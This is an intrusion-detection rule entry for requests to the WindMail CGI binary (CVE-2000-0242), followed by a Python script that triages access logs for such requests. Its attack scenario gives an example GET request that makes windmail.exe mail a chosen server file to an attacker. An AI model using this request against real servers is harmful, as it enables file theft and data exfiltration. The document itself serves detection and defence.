GEN:SID 1:1158
Message WEB-MISC windmail.exe access
Summary This event is generated when an attempt is made to access the executable
file WindMail.exe using a web connection.
Impact Remote attackers could subvert the WindMail mailer to read or execute
arbitrary files on the web server.
Detailed Information WindMail is a command-line mail program for Windows. It is sometimes
deployed for scripting or for sending email through a web application.
Some WindMail deployments make windmail.exe a CGI application, which it was
not designed to be. The result is that an attacker could read or
execute arbitrary files on the system that the web server has access to.
WindMail should never be a CGI application itself; it should instead be called
by another program that properly filters input.
Affected Systems All systems using windmail.exe
Attack Scenarios http://target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address
Ease of Attack Simple crafting of a web GET request
Corrective Action Look at the packet to determine whether a request was made via an HTTP GET
for the windmail.exe application. If so, determine whether the attacked
web server had windmail.exe on it.
Additional References  
Rule References arachnids: 465
bugtraq: 1073
cve: 2000-0242
nessus: 10365
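
The check described under Corrective Action, as an added example that is not part of the rule documentation: it triages web server access-log lines for windmail.exe requests, decodes the query string, and notes whether the response status suggests the binary was present. It assumes Common/Combined Log Format logs; the function names, the sample lines and the status-code heuristic are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Request and status fields of a Common/Combined Log Format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] '
    '"GET /cgi-bin/windmail.exe?%20-n%20desired.file%20recipient@example.com HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/2001:10:00:05 +0000] "GET /cgi-bin/WindMail.exe HTTP/1.0" 404 209',
    '192.0.2.12 - - [01/Jan/2001:10:00:09 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

def triage(line):
    """Return a finding dict for a windmail.exe request, or None for anything else."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("uri").partition("?")
    # Decode once and lowercase so %-encoded or mixed-case spellings still match.
    if "windmail.exe" not in unquote(path).lower():
        return None
    args = unquote(query).split()
    status = int(m.group("status"))
    return {
        "client": line.split()[0],
        "method": m.group("method"),
        "status": status,
        # Heuristic (assumption): a 404 suggests the binary is absent, so the
        # request was a probe; still confirm on the server's file system.
        "binary_likely_present": status != 404,
        # The scenario on this page passes "-n <file> <address>" in the query.
        "file_argument": args[args.index("-n") + 1] if "-n" in args[:-1] else None,
    }

def findings(lines):
    """Triage every line and keep only the windmail.exe hits."""
    return [f for f in map(triage, lines) if f is not None]

if __name__ == "__main__":
    for f in findings(SAMPLE_LOG):
        print(f)
```

A hit with a non-404 status and a file argument is the case to escalate: check the server for windmail.exe and identify which file the request named.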